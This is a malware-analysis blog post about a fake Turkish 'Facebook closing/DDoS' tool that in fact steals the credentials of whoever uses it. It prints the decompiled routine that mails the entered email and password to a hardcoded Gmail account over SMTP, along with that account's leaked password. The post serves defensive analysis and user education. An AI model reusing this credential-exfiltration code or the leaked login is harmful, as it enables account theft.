Friday, October 13, 2017

Fake Facebook DDoS Malware – Actually a password stealer

Last month security researchers discovered Facebook password stealer malware with njRat. This month we got another malware which claims that it can target a given profile and perform DDoS. But it actually a password stealer and it targets the Turkish users.

Static Analysis of the sample (code analysis)
MD5: F7BED7CD45A98275470707E54976C009
File Type: 32-Bit Exe
Size: 845824 Byte(s)
Figure 1 CompilerDetect -> .NET
The malware is compiled using .Net and we started to work on the strings and code analysis of this sample. When we looked in to the strings, we found very interesting details:

·         0000000CCA0D   0000004CE60D      0   Account Close
·         0000000CCA29   0000004CE629      0   CheckBox3
·         0000000CCA63   0000004CE663      0   ProgressBar1
·         0000000CCA7D   0000004CE67D      0   Label4
·         0000000CCADF   0000004CE6DF      0   $this.BackgroundImage
·         0000000CCB0B   0000004CE70B      0   $this.Icon
·         0000000CCB21   0000004CE721      0   FACEBOOK
·         0000000CCB33   0000004CE733      0   FACEBOOK KAPATMA 2017
·         0000000CCB5F   0000004CE75F      0   Login Successful Account will be closed within 5 minutes.
·         0000000CCBD3   0000004CE7D3      0   furkanbabalog(at)gmail.com
·         0000000CCC03   0000004CE803      0   smtp.gmail.com
·         0000000CCC21   0000004CE821      0   sanane123
·         0000000CCC35   0000004CE835      0   Facebook_Kapatma_2017.Resources
·         0000000CDB66   0000004D2166      0   VS_VERSION_INFO
·         0000000CDBC2   0000004D21C2      0   VarFileInfo
·         0000000CDBE2   0000004D21E2      0   Translation
·         0000000CDC06   0000004D2206      0   StringFileInfo
·         0000000CDC2A   0000004D222A      0   000004b0
·         0000000CDC42   0000004D2242      0   FileDescription
·         0000000CDC64   0000004D2264      0   Facebook Kapatma 2017
·         0000000CDC96   0000004D2296      0   FileVersion
·         0000000CDCB0   0000004D22B0      0   1.0.0.0
·         0000000CDCC6   0000004D22C6      0   InternalName
·         0000000CDCE0   0000004D22E0      0   Facebook Kapatma 2017.exe

 File description, resource details and email credentials (highlighted in red colours) are found inside the sample. Using this credential, we tried to login and stop the victim. But Gmail stops to verify that device isn’t recognise. It probably place holder account for hacker.
Figure 2 Gmail security ask for verification

File resources showing image as background which appears like hackers in movie posters.
Figure 3 Background Image

Figure 4 Facebook Kapatma
‘Kapatma’ is a Turkish word and it means ‘close down’. The above image is the detail of the classes found in the code. Inside the code we find input details as in the checkbox and label.
                this.Label1.Text = "E-posta"; // E-posta means email.
this.Label2.Text = "Şifre"; // Şifre means password.
this.CheckBox1.Text = "Ddos Attack";
this.Button1.Text = "Hesabı Kapat"; // Hesabi kapat means close account.
this.Label3.Text = "URL:";
this.CheckBox3.Text = "Complaint Attack\r\n";
this.Label4.Text = "NOT:Hesap 5Dakika İçerisinde Kapatılır ! "; // Acc. Closed Within 5 Min
The purpose is to collect the Facebook credentials to login in the tool and mentioned url will be the profile to be attacked. Let see how the collected details will be transferred.
private void Button1_Click(object sender, EventArgs e)
{ MailMessage mailMessage = new MailMessage();
Try {
Interaction.MsgBox("Login Successful Account will be closed within 5 minutes.", MsgBoxStyle.OkOnly, null);
mailMessage.From = new MailAddress("furkanbabalog(at)gmail.com");
mailMessage.To.Add("furkanbabalog(at)gmail.com");
mailMessage.Subject = this.TextBox1.Text;
mailMessage.Body = this.TextBox2.Text;
new SmtpClient("smtp.gmail.com")
{Port = 587,
EnableSsl = true,
Credentials = new NetworkCredential("furkanbabalog(at)gmail.com", "sanane123")
}.Send(mailMessage);
}
The above code snippet shows that the collected credentials are send us email by login to the given gmail account and sent the detail to same account (i.e.) from and to address are same email address only. 

Behavioural analysis

We executed the sample in our controlled environment. We observed that the file opens gui as follows:
Figure 5 GUI of the fake tool
We entered random text inside the text box, selected all the boxes. Once we clicked the button, message box appears as login successful account will be closed in 5 minutes.

Figure 6 Login successful message box


No any file traces and registry traces are added after the execution of this malware.

Conclusion:

We are seeing this emerging trend as Facebook hacking tools and DDoS tools which actually steals the tool user credentials and not the given target. It is high time to educate the user that these tools are fake tools - password stealer and not a hack tool or crack tool. In this case, it targets Turkish people and we may expect these kind of tools to other part of the world. 
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

How Malware Uses GetThreadContext() to Detect Debuggers – And How to Bypass It?

  Introduction In the world of malware reverse engineering , understanding how malware detects debuggers is crucial. One of the most common ...